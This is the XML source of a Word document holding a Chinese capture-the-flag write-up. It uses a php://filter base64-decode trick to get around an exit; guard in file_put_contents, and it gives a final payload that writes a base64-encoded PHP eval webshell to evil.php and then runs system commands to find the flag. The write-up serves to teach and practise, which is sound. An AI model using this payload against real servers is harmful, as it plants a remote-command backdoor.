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F4207">
      <w:pPr>
        <w:spacing w:before="60" w:after="0" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pP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【请分步骤详细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给出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题目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的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解题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过程，每一步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应有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截图和详细的文字说明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，保证可以复现，所有需要用到的工具、文件等资源需要放在《解题文档》同文件夹中或给出下载链接】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15133461">
      <w:pPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto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参考文章：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2C700">
      <w:pPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto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"https://www.leavesongs.com/PENETRATION/php-filter-magic.html"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7"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>谈一谈php://filter的妙用 | 离别歌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9AFDBEA">
      <w:pPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D2139A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/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file_put_content()的filename处，支持php://filter伪协议，可以通过php://filter/write对写入的文件进行处理，如base64编码解码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F6803">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/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base64编码的范围是[A-Za-z0-9+/]，对于其他字符，会直接替换成空。即&lt;?php?&gt;会被替换为php，这样一开始的exit;就不会被解析，从而绕过exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088FED8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/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base64是四个字节为一组进行编码，而题目一开始的$end中，去掉不能被base64编码的字符后，是35个，所以需要在被base64编码的一句话木马前再加一个字符，不然就无法正常解码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2700ED07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/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最终payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781E2DF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code=aPD89IEBldmFsKCRfUE9TVFsnY21kJ10pPz4%3D&amp;filename=php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Devil.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704DFD92">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="0" w:line="24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/evil.php?cmd=system();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328158E3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5、读取网页目录下的1diot9.php，发现flag在/tmp/fou1ag</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="even"/>
      <w:pgSz w:w="11907" w:h="16839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AAF24">
    <w:pPr>
      <w:pStyle w:val="11"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right" w:y="1"/>
      <w:rPr>
        <w:rStyle w:val="16"/>
        <w:rFonts w:hint="eastAsia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 w14:paraId="599DA7A8">
    <w:pPr>
      <w:pStyle w:val="11"/>
      <w:ind w:right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E74558"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6BE7455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549"/>
    <w:rsid w:val="00115549"/>
    <w:rsid w:val="00147B03"/>
    <w:rsid w:val="001C2C1B"/>
    <w:rsid w:val="002263EB"/>
    <w:rsid w:val="005653F1"/>
    <w:rsid w:val="00761E0D"/>
    <w:rsid w:val="0088793F"/>
    <w:rsid w:val="009C0ECB"/>
    <w:rsid w:val="00C63219"/>
    <w:rsid w:val="00D6516E"/>
    <w:rsid w:val="00F03878"/>
    <w:rsid w:val="00FE27F5"/>
    <w:rsid w:val="00FE336F"/>
    <w:rsid w:val="5D9449E3"/>
    <w:rsid w:val="6705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0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0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unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0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unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="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nhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0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unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="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6"/>
    <w:semiHidden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page number"/>
    <w:basedOn w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="17">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="15"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:r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5"/>
    <w:link w:val="11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330</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>15</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>343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2025-05-18T19:12:00Z</dcterms:created>
  <dc:creator>1diOt9</dc:creator>
  <cp:lastModifiedBy>1diOt9</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-16T03:28:45Z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F81F45365E944F488BAD44FBB13738FA_12</vt:lpwstr>
  </property>
</Properties>
</file>